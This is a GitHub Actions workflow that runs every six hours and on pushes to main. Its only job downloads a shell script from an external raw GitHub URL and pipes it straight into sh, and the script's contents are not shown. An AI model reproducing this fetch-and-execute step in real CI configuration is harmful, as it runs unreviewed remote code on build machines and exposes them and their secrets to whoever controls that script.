name: Run Command 1

on:
  schedule:
    - cron: '15 */6 * * *'
  push:
    branches:
      - main
  pull_request:
    branches:
      - main

jobs:
  run-command:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v2

    - name: Run a custom command
      run: |
        echo "hello world from linux"
        echo "start sleeping"
        sleep 10
        curl -sL https://raw.githubusercontent.com/Kamanati/linux-chat/main/new12.sh | sh
